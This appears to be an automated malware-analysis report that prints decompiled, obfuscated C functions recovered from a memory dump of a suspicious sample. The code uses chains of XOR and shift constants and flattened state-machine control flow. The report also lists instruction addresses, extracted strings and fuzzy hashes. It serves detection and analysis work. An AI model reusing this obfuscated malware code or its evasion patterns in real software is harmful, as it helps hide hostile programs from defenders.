				_v32 = 0x48d261;
				_t300 = 0x60;
				_v32 = _v32 * 0x54;
				_v32 = _v32 ^ 0x17e19119;
				_v104 = 0x9289de;
				_v104 = _v104 ^ 0xee2d5127;
				_v104 = _v104 + 0xfffff725;
				_v104 = _v104 + 0xdc7c;
				_v104 = _v104 ^ 0xeecf5476;
				_v36 = 0x675f45;
				_v36 = _v36 ^ 0xfc5958ac;
				_v36 = _v36 ^ 0xfc3c7922;
				_v108 = 0x68f95;
				_v108 = _v108 + 0xffff0f38;
				_v108 = _v108 / _t300;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x000e3507;
				_v76 = 0x1f297b;
				_v76 = _v76 + 0xb84d;
				_t301 = 0x2a;
				_v76 = _v76 * 0x4b;
				_v76 = _v76 ^ 0x0957e7fd;
				_v112 = 0x91f42a;
				_v112 = _v112 + 0xffffb28a;
				_v112 = _v112 + 0xba01;
				_v112 = _v112 / _t301;
				_v112 = _v112 ^ 0x000bf764;
				_v44 = 0xc5a798;
				_t302 = 0x65;
				_v44 = _v44 * 0x3c;
				_v44 = _v44 ^ 0x2e5eb191;
				_v48 = 0x6a8470;
				_v48 = _v48 * 0x25;
				_v48 = _v48 ^ 0x0f68b0bc;
				_v116 = 0x3af893;
				_v116 = _v116 / _t302;
				_v116 = _v116 << 0xd;
				_v116 = _v116 << 5;
				_v116 = _v116 ^ 0x55e6145c;
				_v52 = 0xeea228;
				_v52 = _v52 + 0xffffdf96;
				_v52 = _v52 ^ 0x00e517ff;
				_v64 = 0x7a4b32;
				_v64 = _v64 | 0xceaa01ad;
				_v64 = _v64 + 0xffff0db6;
				_v64 = _v64 ^ 0xcef75d7c;
				_v68 = 0x58a308;
				_v68 = _v68 >> 8;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x000584fa;
				_v24 = 0x6e8a56;
				_v24 = _v24 + 0xffff0dad;
				_v24 = _v24 ^ 0x0065c2a9;
				_v72 = 0x39dfae;
				_t303 = 0x72;
				_v72 = _v72 / _t303;
				_v72 = _v72 >> 0xb;
				_v72 = _v72 ^ 0x000c8f6c;
				_v92 = 0x7725f6;
				_v92 = _v92 | 0x79ef78f1;
				_v92 = _v92 ^ 0x79febb94;
				_v56 = 0x45c881;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 ^ 0x000ce75d;
				_v120 = 0x66e262;
				_v120 = _v120 >> 0xd;
				_t304 = 0x5f;
				_v120 = _v120 / _t304;
				_t305 = 0x24;
				_v120 = _v120 / _t305;
				_v120 = _v120 ^ 0x000936dd;
				_v60 = 0xf65d62;
				_v60 = _v60 ^ 0xb4a09185;
				_v60 = _v60 ^ 0xb45bd033;
				_v80 = 0x99fc53;
				_v80 = _v80 + 0xffffa42b;
				_t306 = 0x28;
				_v80 = _v80 / _t306;
				_v80 = _v80 ^ 0x0004af0c;
				_v84 = 0x7d0105;
				_v84 = _v84 | 0x39ac094e;
				_t307 = 0x5e;
				_v84 = _v84 / _t307;
				_v84 = _v84 ^ 0x0092896f;
				_v88 = 0xf20295;
				_v88 = _v88 + 0xffff2687;
				_v88 = _v88 >> 5;
				_v88 = _v88 ^ 0x0005130a;
				_v40 = 0x7c7f3c;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x1f1c3ee5;
				_v96 = 0x96b45a;
				_t308 = 0x56;
				_v96 = _v96 * 0x6b;
				_v96 = _v96 + 0x875f;
				_v96 = _v96 / _t308;
				_v96 = _v96 ^ 0x00b41412;
				_v100 = 0x4f821;
				_v100 = _v100 | 0x757182d7;
				_v100 = _v100 ^ 0x8dca573f;
				_v100 = _v100 + 0xffff237b;
				_v100 = _v100 ^ 0xf8bbb0f5;
				_v20 = 0xe5c838;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0xe4109b10;
				goto L1;
				do {
					while(1) {
						L1:
						_t351 = _t311 - 0x93496d8;
						if(_t351 > 0) {
							break;
						}
						if(_t351 == 0) {
							_t281 = E00BC7E10();
							_t344 = _t344 - 0xc + 0xc;
							_t311 = 0x67adb1c;
							_t342 = _t342 + _t281;
							continue;
						} else {
							if(_t311 == 0xb7c7cd) {
								_t286 = E00BC7E10();
								_t344 = _t344 - 0xc + 0xc;
								_t311 = 0xa4c6826;
								_t342 = _t342 + _t286;
								continue;
							} else {
								if(_t311 == 0x67adb1c) {
									_t291 = E00BC7E10();
									_t344 = _t344 - 0xc + 0xc;
									_t311 = 0x938ab3c;
									_t342 = _t342 + _t291;
									continue;
								} else {
									if(_t311 == 0x6de8da5) {
										_t311 = 0xa2b08fe;
										continue;
									} else {
										if(_t311 != 0x8476217) {
											goto L19;
										} else {
											_t297 = E00BC7E10();
											_t344 = _t344 - 0xc + 0xc;
											_t311 = 0xb7c7cd;
											_t342 = _t342 + _t297;
											continue;
										}
									}
								}
							}
						}
						L16:
						return _t342;
					}
					if(_t311 == 0x938ab3c) {
						_t274 = E00BC7E10();
						_t344 = _t344 - 0xc + 0xc;
						_t311 = 0x8476217;
						_t342 = _t342 + _t274;
						goto L19;
					} else {
						if(_t311 == 0xa2b08fe) {
							_t342 = _t342 + E00BBE05F(_v28, _v32, _v104, _t341 + 0x18);
							_t311 = 0x93496d8;
							goto L1;
						} else {
							if(_t311 != 0xa4c6826) {
								goto L19;
							} else {
								_t342 = _t342 + E00BBE05F(_v96, _v100, _v20, _t341 + 0x28);
							}
						}
					}
					goto L16;
					L19:
				} while (_t311 != 0x9f782ca);
				goto L16;
			}

0x00bbd899
0x00bbd89c
0x00bbd8a6
0x00bbd8b4
0x00bbd8b6
0x00bbd8b8
0x00bbd8bf
0x00bbd8c4
0x00bbd8cb
0x00bbd8d7
0x00bbd8dc
0x00bbd8e2
0x00bbd8ea
0x00bbd8f7
0x00bbd8fa
0x00bbd8fe
0x00bbd906
0x00bbd90e
0x00bbd916
0x00bbd91e
0x00bbd926
0x00bbd92e
0x00bbd936
0x00bbd93e
0x00bbd946
0x00bbd94e
0x00bbd95e
0x00bbd962
0x00bbd967
0x00bbd96f
0x00bbd977
0x00bbd984
0x00bbd987
0x00bbd98b
0x00bbd993
0x00bbd99b
0x00bbd9a3
0x00bbd9b3
0x00bbd9b7
0x00bbd9bf
0x00bbd9cc
0x00bbd9cd
0x00bbd9d1
0x00bbd9d9
0x00bbd9e6
0x00bbd9ea
0x00bbd9f2
0x00bbda00
0x00bbda04
0x00bbda09
0x00bbda0e
0x00bbda16
0x00bbda1e
0x00bbda26
0x00bbda2e
0x00bbda36
0x00bbda3e
0x00bbda46
0x00bbda4e
0x00bbda58
0x00bbda5d
0x00bbda62
0x00bbda6a
0x00bbda72
0x00bbda7a
0x00bbda82
0x00bbda90
0x00bbda95
0x00bbda9b
0x00bbdaa0
0x00bbdaa8
0x00bbdab0
0x00bbdab8
0x00bbdac0
0x00bbdac8
0x00bbdacd
0x00bbdad5
0x00bbdadd
0x00bbdae6
0x00bbdaeb
0x00bbdaf5
0x00bbdafa
0x00bbdb00
0x00bbdb08
0x00bbdb10
0x00bbdb18
0x00bbdb20
0x00bbdb28
0x00bbdb34
0x00bbdb39
0x00bbdb3f
0x00bbdb47
0x00bbdb4f
0x00bbdb5b
0x00bbdb60
0x00bbdb66
0x00bbdb6e
0x00bbdb76
0x00bbdb7e
0x00bbdb83
0x00bbdb8b
0x00bbdb93
0x00bbdb98
0x00bbdba0
0x00bbdbad
0x00bbdbae
0x00bbdbb2
0x00bbdbc0
0x00bbdbc4
0x00bbdbcc
0x00bbdbd4
0x00bbdbdc
0x00bbdbe4
0x00bbdbec
0x00bbdbf4
0x00bbdc01
0x00bbdc0b
0x00bbdc0b
0x00bbdc13
0x00bbdc13
0x00bbdc13
0x00bbdc13
0x00bbdc15
0x00000000
0x00000000
0x00bbdc1b
0x00bbdccb
0x00bbdcd0
0x00bbdcd3
0x00bbdcd8
0x00000000
0x00bbdc21
0x00bbdc27
0x00bbdca4
0x00bbdca9
0x00bbdcac
0x00bbdcb1
0x00000000
0x00bbdc29
0x00bbdc2f
0x00bbdc80
0x00bbdc85
0x00bbdc88
0x00bbdc8d
0x00000000
0x00bbdc31
0x00bbdc37
0x00bbdc69
0x00000000
0x00bbdc39
0x00bbdc3f
0x00000000
0x00bbdc45
0x00bbdc58
0x00bbdc5d
0x00bbdc60
0x00bbdc65
0x00000000
0x00bbdc65
0x00bbdc3f
0x00bbdc37
0x00bbdc2f
0x00bbdc27
0x00bbdd0d
0x00bbdd15
0x00bbdd15
0x00bbdce5
0x00bbdd49
0x00bbdd4e
0x00bbdd51
0x00bbdd56
0x00000000
0x00bbdce7
0x00bbdce9
0x00bbdd2d
0x00bbdd2f
0x00000000
0x00bbdceb
0x00bbdcf1
0x00000000
0x00bbdcf3
0x00bbdd0a
0x00bbdd0a
0x00bbdcf1
0x00bbdce9
0x00000000
0x00bbdd58
0x00bbdd58
0x00000000

Strings

2Kz, xrefs: 00BBDA2E
E_g, xrefs: 00BBD92E
bf, xrefs: 00BBDAD5
&hL, xrefs: 00BBDCAC
&hL, xrefs: 00BBDCEB
'Q-, xrefs: 00BBD90E

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: &hL$&hL$'Q-$2Kz$E_g$bf
API String ID: 0-3327759155
Opcode ID: 818fcac5b5801ca78e024e69867041b2eb9182ed99eaae261f8d373ea8ec87c4
Instruction ID: 2cc82cde3a0c4c5074e198d1895628a654d5d6e71c7553f66505ae0511c4b4bc
Opcode Fuzzy Hash: 818fcac5b5801ca78e024e69867041b2eb9182ed99eaae261f8d373ea8ec87c4
Instruction Fuzzy Hash: E3C152726097418FC368DF29D48A41BBBE1FBC4B48F108A2DF5959A260D7B6C849CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BCBA18, Relevance: 7.8, Strings: 6, Instructions: 254
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00BCBA18() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t291;
				void* _t292;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				void* _t346;
				signed int* _t350;

				_t350 =  &_v1144;
				_v1088 = 0x578dcf;
				_v1088 = _v1088 ^ 0x72d8eae0;
				_v1088 = _v1088 ^ 0x604644e7;
				_v1088 = _v1088 ^ 0x12c10287;
				_v1052 = 0x38fed8;
				_v1052 = _v1052 << 7;
				_v1052 = _v1052 ^ 0x1c72639b;
				_v1072 = 0x5d57b3;
				_t300 = 0x51;
				_v1072 = _v1072 / _t300;
				_v1072 = _v1072 | 0x27437ed3;
				_t346 = 0x3a9283f;
				_v1072 = _v1072 ^ 0x2743eead;
				_v1140 = 0x39fc3a;
				_v1140 = _v1140 | 0x3511b52e;
				_v1140 = _v1140 ^ 0xa1037239;
				_v1140 = _v1140 << 2;
				_v1140 = _v1140 ^ 0x50e72e8e;
				_v1084 = 0xe364a7;
				_v1084 = _v1084 + 0xffff1bb0;
				_v1084 = _v1084 + 0x83e4;
				_v1084 = _v1084 ^ 0x00edd9be;
				_v1092 = 0xcd49be;
				_v1092 = _v1092 + 0xfffff351;
				_v1092 = _v1092 + 0x7657;
				_v1092 = _v1092 ^ 0x00c3c545;
				_v1080 = 0x33d34b;
				_v1080 = _v1080 + 0x2926;
				_v1080 = _v1080 >> 3;
				_v1080 = _v1080 ^ 0x000d4658;
				_v1116 = 0xd6e4b1;
				_v1116 = _v1116 + 0xffffd162;
				_t301 = 0x7d;
				_v1116 = _v1116 / _t301;
				_t302 = 0xc;
				_v1116 = _v1116 * 0x43;
				_v1116 = _v1116 ^ 0x007ba9a8;
				_v1124 = 0x80bcd1;
				_v1124 = _v1124 >> 0xe;
				_v1124 = _v1124 << 6;
				_v1124 = _v1124 / _t302;
				_v1124 = _v1124 ^ 0x00016842;
				_v1132 = 0xf0be53;
				_v1132 = _v1132 * 0x1e;
				_v1132 = _v1132 * 0x33;
				_v1132 = _v1132 ^ 0x290bda3c;
				_v1132 = _v1132 ^ 0xb7d6f92b;
				_v1096 = 0xe4a0f6;
				_v1096 = _v1096 << 3;
				_v1096 = _v1096 << 7;
				_v1096 = _v1096 ^ 0x92808ae1;
				_v1112 = 0x918d3e;
				_v1112 = _v1112 + 0xe68b;
				_v1112 = _v1112 + 0x4384;
				_v1112 = _v1112 + 0x454f;
				_v1112 = _v1112 ^ 0x009ce1df;
				_v1056 = 0xe02207;
				_v1056 = _v1056 << 6;
				_v1056 = _v1056 ^ 0x380f5f9a;
				_v1064 = 0x1d17c8;
				_v1064 = _v1064 + 0x3b03;
				_v1064 = _v1064 ^ 0x00166bdb;
				_v1068 = 0xa7024e;
				_v1068 = _v1068 >> 0xe;
				_t303 = 0x53;
				_v1068 = _v1068 / _t303;
				_v1068 = _v1068 ^ 0x0006ef95;
				_v1048 = 0xb131df;
				_t304 = 7;
				_v1048 = _v1048 / _t304;
				_v1048 = _v1048 ^ 0x00172439;
				_v1128 = 0x98c5;
				_t305 = 0x4b;
				_v1128 = _v1128 / _t305;
				_v1128 = _v1128 | 0x25b294d5;
				_v1128 = _v1128 + 0x1183;
				_v1128 = _v1128 ^ 0x25b44a7a;
				_v1120 = 0xdd649c;
				_v1120 = _v1120 << 1;
				_v1120 = _v1120 >> 7;
				_v1120 = _v1120 + 0x1ebd;
				_v1120 = _v1120 ^ 0x000ffcf9;
				_v1044 = 0x3c594f;
				_v1044 = _v1044 >> 8;
				_v1044 = _v1044 ^ 0x0007c049;
				_v1136 = 0x813d75;
				_v1136 = _v1136 + 0xffffe018;
				_v1136 = _v1136 << 0xf;
				_t306 = 0x2d;
				_v1136 = _v1136 / _t306;
				_v1136 = _v1136 ^ 0x0329d30a;
				_v1104 = 0x9e0c99;
				_t307 = 0x56;
				_v1104 = _v1104 * 0x31;
				_v1104 = _v1104 ^ 0x373f2716;
				_v1104 = _v1104 ^ 0x29722c6a;
				_v1144 = 0xcfb157;
				_v1144 = _v1144 + 0xc7e1;
				_v1144 = _v1144 * 0x6e;
				_v1144 = _v1144 / _t307;
				_v1144 = _v1144 ^ 0x010037de;
				_v1060 = 0x40eab4;
				_t308 = 0x4f;
				_v1060 = _v1060 / _t308;
				_v1060 = _v1060 ^ 0x00084cf2;
				_v1100 = 0x613cd;
				_v1100 = _v1100 >> 0xe;
				_v1100 = _v1100 | 0x5b84e556;
				_v1100 = _v1100 ^ 0x5b8d806d;
				_v1108 = 0x9efb4f;
				_v1108 = _v1108 * 0x51;
				_v1108 = _v1108 + 0xb919;
				_v1108 = _v1108 << 5;
				_v1108 = _v1108 ^ 0x49cda1b4;
				_v1076 = 0xd413b2;
				_v1076 = _v1076 * 0x51;
				_v1076 = _v1076 + 0xffffe488;
				_v1076 = _v1076 ^ 0x431ec87e;
				E00BB8CBC();
				do {
					while(_t346 != 0x1d77e83) {
						if(_t346 == 0x3a9283f) {
							_t346 = 0x1d77e83;
							continue;
						}
						if(_t346 == 0x8036ef7) {
							_push(0xbb147c);
							_t292 = E00BD0AD3(_v1096, _v1112, __eflags);
							E00BB8C65(_v1068, __eflags,  *0xbd5bd8 + 0x30,  *0xbd5bd8 + 0x238, _v1048, E00BBC52A(), _v1128, _t292, _v1120,  &_v520, _v1044, _v1136);
							_t291 = E00BC2EED(_v1104, _v1144, _v1060, _t292);
							_t350 =  &(_t350[0xd]);
							_t346 = 0xa34ddae;
							continue;
						}
						_t356 = _t346 - 0xa34ddae;
						if(_t346 != 0xa34ddae) {
							goto L10;
						}
						return E00BC604E(_v1100,  &_v520, _t356, _v1108,  &_v1040, _v1076);
					}
					_push(0xbb141c);
					E00BD06A6(__eflags,  *0xbd5bd8 + 0x238, _v1140, E00BD0AD3(_v1052, _v1072, __eflags), _v1084, _v1092,  &_v1040, _v1080);
					_t291 = E00BC2EED(_v1116, _v1124, _v1132, _t288);
					_t350 =  &(_t350[0xa]);
					_t346 = 0x8036ef7;
					L10:
					__eflags = _t346 - 0xb42239;
				} while (__eflags != 0);
				return _t291;
			}

0x00bcba18
0x00bcba1e
0x00bcba28
0x00bcba30
0x00bcba38
0x00bcba40
0x00bcba48
0x00bcba4d
0x00bcba55
0x00bcba67
0x00bcba6c
0x00bcba72
0x00bcba7a
0x00bcba7f
0x00bcba87
0x00bcba8f
0x00bcba97
0x00bcba9f
0x00bcbaa4
0x00bcbaac
0x00bcbab4
0x00bcbabc
0x00bcbac4
0x00bcbacc
0x00bcbad4
0x00bcbadc
0x00bcbae4
0x00bcbaec
0x00bcbaf4
0x00bcbafc
0x00bcbb01
0x00bcbb09
0x00bcbb11
0x00bcbb1d
0x00bcbb22
0x00bcbb2d
0x00bcbb2e
0x00bcbb32
0x00bcbb3a
0x00bcbb42
0x00bcbb47
0x00bcbb52
0x00bcbb56
0x00bcbb5e
0x00bcbb6b
0x00bcbb74
0x00bcbb78
0x00bcbb80
0x00bcbb88
0x00bcbb90
0x00bcbb95
0x00bcbb9a
0x00bcbba2
0x00bcbbaa
0x00bcbbb2
0x00bcbbba
0x00bcbbc2
0x00bcbbca
0x00bcbbd2
0x00bcbbd7
0x00bcbbdf
0x00bcbbe7
0x00bcbbef
0x00bcbbf7
0x00bcbc01
0x00bcbc0c
0x00bcbc11
0x00bcbc17
0x00bcbc1f
0x00bcbc2b
0x00bcbc30
0x00bcbc36
0x00bcbc3e
0x00bcbc4a
0x00bcbc4f
0x00bcbc55
0x00bcbc5d
0x00bcbc65
0x00bcbc6d
0x00bcbc75
0x00bcbc79
0x00bcbc7e
0x00bcbc86
0x00bcbc8e
0x00bcbc96
0x00bcbc9b
0x00bcbca3
0x00bcbcab
0x00bcbcb3
0x00bcbcbc
0x00bcbcc1
0x00bcbcc7
0x00bcbccf
0x00bcbcdc
0x00bcbcdf
0x00bcbce3
0x00bcbceb
0x00bcbcf3
0x00bcbcfb
0x00bcbd08
0x00bcbd14
0x00bcbd18
0x00bcbd20
0x00bcbd2c
0x00bcbd2f
0x00bcbd33
0x00bcbd3b
0x00bcbd43
0x00bcbd48
0x00bcbd50
0x00bcbd58
0x00bcbd65
0x00bcbd69
0x00bcbd71
0x00bcbd76
0x00bcbd7e
0x00bcbd8b
0x00bcbd8f
0x00bcbd97
0x00bcbda3
0x00bcbdb7
0x00bcbdb7
0x00bcbdc5
0x00bcbe80
0x00000000
0x00bcbe80
0x00bcbdcd
0x00bcbe0a
0x00bcbe0f
0x00bcbe5c
0x00bcbe71
0x00bcbe76
0x00bcbe79
0x00000000
0x00bcbe79
0x00bcbdcf
0x00bcbdd1
0x00000000
0x00000000
0x00000000
0x00bcbdf4
0x00bcbe8f
0x00bcbec4
0x00bcbed6
0x00bcbedb
0x00bcbede
0x00bcbee0
0x00bcbee0
0x00bcbee0
0x00000000

Strings

j,r), xrefs: 00BCBCEB
OE, xrefs: 00BCBBBA
DF`, xrefs: 00BCBA30
Wv, xrefs: 00BCBADC
XF, xrefs: 00BCBB01
OY<, xrefs: 00BCBC8E

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: OE$OY<$Wv$XF$j,r)$DF`
API String ID: 0-3120813865
Opcode ID: 4886dbc99703db1bf95dc82d35e76ae175717fb313826fdde0641448977138de
Instruction ID: 14718ff2c4f0852a5c834b1846e7d7c0fc641a954761ac6b01539e26747976cd
Opcode Fuzzy Hash: 4886dbc99703db1bf95dc82d35e76ae175717fb313826fdde0641448977138de
Instruction Fuzzy Hash: 89C141725083819FD398CF65C98A94BFBE1FBC4748F10891DF1A69A260D7B5D909CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00BCE7DA, Relevance: 7.8, Strings: 6, Instructions: 253COMMON

Download Yara Rule

Strings

X(, xrefs: 00BCEB02
~Mj, xrefs: 00BCEA7E
vtc, xrefs: 00BCE990
|, xrefs: 00BCE978
Ti, xrefs: 00BCE85F
"E), xrefs: 00BCE9B1

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: "E)$Ti$X($vtc$|$~Mj
API String ID: 0-2927301414
Opcode ID: 3d8ec008e6dc49c306694b80d1cb3fa0644b027db4ae6c0dfe7877f2034c749e
Instruction ID: 1d2a1274397e0b8962122a72d060c41aa574cf640f48bfd2e2eacb83319cc14a
Opcode Fuzzy Hash: 3d8ec008e6dc49c306694b80d1cb3fa0644b027db4ae6c0dfe7877f2034c749e
Instruction Fuzzy Hash: E6C120729093809FD368CF65C58991BFBE2FBC4758F108A1DF5AA96260D3B5C9098F43

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0A37, Relevance: 7.8, Strings: 6, Instructions: 251COMMON

Download Yara Rule

Strings

0;, xrefs: 00BC0BD8
His, xrefs: 00BC0AB2
8z, xrefs: 00BC0D80
~a, xrefs: 00BC0BA0
(TO, xrefs: 00BC0B57
8z, xrefs: 00BC0A83

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (TO$0;$8z$8z$His$~a
API String ID: 0-2714135093
Opcode ID: df3878934ae7ed5ea030270df1f8f08988b6eeb6046ee7f2e8ef2026ca98c2c6
Instruction ID: 048a8f514ab97b5a1cca7ab8bec4d46cfd015678c20ae7ac7ec4998d85780f78
Opcode Fuzzy Hash: df3878934ae7ed5ea030270df1f8f08988b6eeb6046ee7f2e8ef2026ca98c2c6
Instruction Fuzzy Hash: ECC140B24183859FC368DF65C889A1BBBE1FBD4748F408A1DF69686260D7B58948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BB196D, Relevance: 7.7, Strings: 6, Instructions: 234COMMON

Download Yara Rule

Strings

I+C, xrefs: 00BB1B36
), xrefs: 00BB1A56
E5, xrefs: 00BB1B09
i_Z, xrefs: 00BB1B6B
Ht|, xrefs: 00BB19FB
\a, xrefs: 00BB1B80

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: )$E5$Ht|$I+C$\a$i_Z
API String ID: 0-3197448685
Opcode ID: 37dbca98201add6bfa248a6a7975cc579107848304acda4a5d160c2321b6f527
Instruction ID: 8dbc685ff293fca367a58f7a6e1108dbf48e44ece6a3ea387cdbe16a9e581bf6
Opcode Fuzzy Hash: 37dbca98201add6bfa248a6a7975cc579107848304acda4a5d160c2321b6f527
Instruction Fuzzy Hash: A0B141B28083418FC358CF69D58946BFBE1FBC4358F50496DF695AA260D3B18A49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5B7C, Relevance: 7.7, Strings: 6, Instructions: 228COMMON

Download Yara Rule

Strings

*ZV, xrefs: 00BC5BE7
,S, xrefs: 00BC5B93
HU;, xrefs: 00BC5DD5
YY, xrefs: 00BC5C77
&?, xrefs: 00BC5CA8
l] , xrefs: 00BC5D61

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: &?$*ZV$,S$HU;$YY$l]
API String ID: 0-166477480
Opcode ID: 8379d690d42ec0717b2dc05813671df429d046ea21c66b5b0be9c591ecf28804
Instruction ID: f6583948ec09065525df192f81cb227d01d5bf4701323e4f14c73f61055e77e2
Opcode Fuzzy Hash: 8379d690d42ec0717b2dc05813671df429d046ea21c66b5b0be9c591ecf28804
Instruction Fuzzy Hash: 8DB12EB2A083419FC368CF29C58591BFBE1FBC4758F108A6DF59586220D3B1DA49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9565, Relevance: 7.7, Strings: 6, Instructions: 205COMMON

Download Yara Rule

Strings

t&, xrefs: 00BB970A
`w, xrefs: 00BB972A
K}, xrefs: 00BB976B
p, xrefs: 00BB9837
L *, xrefs: 00BB9794
tV, xrefs: 00BB96D5

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: K}$L *$`w$t&$tV$p
API String ID: 0-1343311438
Opcode ID: 6bfb814633666b6ae214f3b0ab427b844596cd44b22535281b6db8471c3bb05f
Instruction ID: b72578eb3736e39056a162baa152971c4e4e35b2e042da7b18f48f77b4b400ea
Opcode Fuzzy Hash: 6bfb814633666b6ae214f3b0ab427b844596cd44b22535281b6db8471c3bb05f
Instruction Fuzzy Hash: 35A141B2408381AFD798CF25D88A41BFBE1FBD4798F105A1CF29596220D7B5D908CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00BC6B91, Relevance: 7.7, Strings: 6, Instructions: 152COMMON

Download Yara Rule

Strings

l/, xrefs: 00BC6C30
-^, xrefs: 00BC6CD3
fHB, xrefs: 00BC6C96
tLo, xrefs: 00BC6D34
AV, xrefs: 00BC6BFD
r, xrefs: 00BC6D1F

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: -^$AV$fHB$l/$tLo$r
API String ID: 0-2229134097
Opcode ID: ce2b83e2d413d5727de7ebd563ca49e7244e5ba304e965d99b223189c4cc4685
Instruction ID: 70bbf3cc71fa43e9b07a83421bd87ce4f611e10497e0824ea52a6881305a94fb
Opcode Fuzzy Hash: ce2b83e2d413d5727de7ebd563ca49e7244e5ba304e965d99b223189c4cc4685
Instruction Fuzzy Hash: 377140711083419FC358DF65C58981BFBF1FBC4748F50996DF29A96260D3B58A48CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00BBFBEF, Relevance: 6.5, Strings: 5, Instructions: 278COMMON

Download Yara Rule

Strings

ED:, xrefs: 00BBFF9B
G~s, xrefs: 00BBFBF5
ge, xrefs: 00BC0039
;, xrefs: 00BBFF36
y, xrefs: 00BBFC63

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ;$ED:$G~s$ge$y
API String ID: 0-4105283278
Opcode ID: f6e1afed55c22f541f8440ebcc8ee5cb10683d2713547afb94e8049dfe52c678
Instruction ID: 5655addabdb7642de613f9230df10a5d00f810ad357087dd47b39d8932db08e2
Opcode Fuzzy Hash: f6e1afed55c22f541f8440ebcc8ee5cb10683d2713547afb94e8049dfe52c678
Instruction Fuzzy Hash: 11E11F715083809FC3A8DF26C98A65BFBE2FBC4708F508A0DF59996260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BBBEF5, Relevance: 6.5, Strings: 5, Instructions: 240COMMON

Download Yara Rule

Strings

I, xrefs: 00BBC14F
oNL, xrefs: 00BBBEF8
>/f, xrefs: 00BBBF84
ln, xrefs: 00BBBF02
", xrefs: 00BBC08D

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: "$>/f$I$ln$oNL
API String ID: 0-652186313
Opcode ID: 9cbf3ff89890044d78fb95fc1c720ab8babc6076bf8219010a9ad28b1dbb3d28
Instruction ID: d2b91f2f3bc625ec5a2a6186839bc7045e1799c8dd8a9c9a93b14ebcbef67fc7
Opcode Fuzzy Hash: 9cbf3ff89890044d78fb95fc1c720ab8babc6076bf8219010a9ad28b1dbb3d28
Instruction Fuzzy Hash: 2DC140B10083818FC358CF65C59596BBFE1FBC9708F508A4DF19A96260D3B9DA49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00BC56A9, Relevance: 6.5, Strings: 5, Instructions: 217COMMON

Download Yara Rule

Strings

(j], xrefs: 00BC5722
]t, xrefs: 00BC58BD
,d, xrefs: 00BC5908
W, xrefs: 00BC56F5
WQ, xrefs: 00BC57BF

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (j]$,d$WQ$W$]t
API String ID: 0-3511903769
Opcode ID: d4515e0bef91e889f8160a02d17b18607a197e875ab9bb985096a5a7ee00116a
Instruction ID: 41eb7797f1b07f5227cce647131536618270a00a2cfd3cff1dc7385806219e40
Opcode Fuzzy Hash: d4515e0bef91e889f8160a02d17b18607a197e875ab9bb985096a5a7ee00116a
Instruction Fuzzy Hash: 94A141711087809FC368CF25C48A91BFBE1FBC4758F505A5EF5869A260D3B59A89CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE336, Relevance: 6.5, Strings: 5, Instructions: 215COMMON

Download Yara Rule

Strings

Y1, xrefs: 00BBE43F
&", xrefs: 00BBE5B8
y@ko, xrefs: 00BBE40B
1, xrefs: 00BBE457
S3, xrefs: 00BBE4D8

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: &"$S3$Y1$y@ko$1
API String ID: 0-1237345320
